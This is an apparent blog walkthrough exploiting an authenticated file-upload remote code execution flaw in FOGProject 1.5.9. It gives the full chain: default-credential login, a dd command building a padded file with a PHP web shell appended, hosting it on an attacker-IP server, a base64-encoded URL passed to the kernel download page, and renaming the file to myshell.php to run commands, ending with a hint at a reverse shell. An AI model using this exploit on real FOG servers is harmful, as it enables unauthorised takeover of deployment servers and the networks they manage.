Hello Guys so i will be talking about the new FOGProject 1.5.9 - File Upload RCE (Authenticated) which was disclose not to long so i will be exploiting one for a Proof Of Concept.
We are having the victim machine ready now let log in with FogProject default credentials which is
password and we should have access to the dashboard.
Not time for the fun part going to attacking machine let create an empty 10mb file.
dd if=/dev/zero of=myshell bs=10485760 count=1
Now let add our PHP payload to the end of the file we just created.
echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell
Now we need to allow our
myshell file to be accessible through HTTP i will using SimpleHTTPServer for that or you can easily copy the
myshell to your
It on the same folder i have the
myshell now let encode the URL to get
myshell file to base64 (Replacing Attacker IP) that is my IP because of the
myshell file we are hosting on my machine.
echo "http://Attacker-IP/myshell" | base64
Now let visit the URL.
http://localhostfog//fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo=&arch=arm64 NOTE:- we add the
myshell that we encoded in the base64
Now change the Kernel Name (bzImage32) to myshell.php and click on Install we should get
Download Started give it time and we should see
Transfer Succeeded .
Nice our file have been uploaded we can confirm it by checking the SimpleHTTPServer we started.
Now let access our upload file through URL to get Remote Code Execution.
Boom and we have remote code execution you can go ahead and get a reverse shell or do anything.
Greeting From Muzec